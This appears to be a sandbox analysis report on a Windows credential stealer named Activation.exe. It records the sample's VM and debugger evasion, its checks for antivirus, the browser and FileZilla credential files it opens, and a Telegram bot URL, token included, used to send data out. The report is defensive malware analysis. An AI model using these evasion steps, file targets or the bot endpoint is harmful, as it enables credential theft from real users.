            Source: C:\Users\user\Desktop\Activation.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599216Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598233Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598102Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597991Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597835Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597728Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597513Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596530Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596395Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 586599Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow / User API: threadDelayed 4525Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow / User API: threadDelayed 2245Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599216s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598233s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -598102s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597991s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597835s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597728s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597513s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596530s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -596395s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exe TID: 7884Thread sleep time: -586599s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Activation.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599216Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598233Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 598102Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597991Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597835Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597728Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597513Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596530Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 596395Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeThread delayed: delay time: 586599Jump to behavior
            Source: Amcache.hve.5.drBinary or memory string: VMware
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
            Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Activation.exe, 00000000.00000002.1645685696.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
            Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\Activation.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\Activation.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\Activation.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\Activation.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\Activation.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\Activation.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\Activation.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\Activation.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess queried: DebugObjectHandleJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Activation.exe, 00000000.00000002.1645685696.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000048BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1655462296.00000000044D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Activation.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            761
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            571
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Process Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Process Injection
            Security Account Manager571
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing
            LSA Secrets124
            System Information Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Activation.exe42%ReversingLabs
            Activation.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://get.geojs.iod0%Avira URL Cloudsafe
            https://api.teleLR0%Avira URL Cloudsafe
            https://get.geoj80%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            get.geojs.io
            104.26.1.100
            truefalse
              high
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocumentfalse
                    high
                    https://get.geojs.io/v1/ip/geo.jsonfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabActivation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://t.me/Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://t.me/freakcodingspotActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.orgActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoActivation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://get.geojs.iodActivation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://t.me/TheDyerActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://upx.sf.netAmcache.hve.5.drfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.ecosia.org/newtab/Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ac.ecosia.org/autocomplete?q=Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.teleLRActivation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
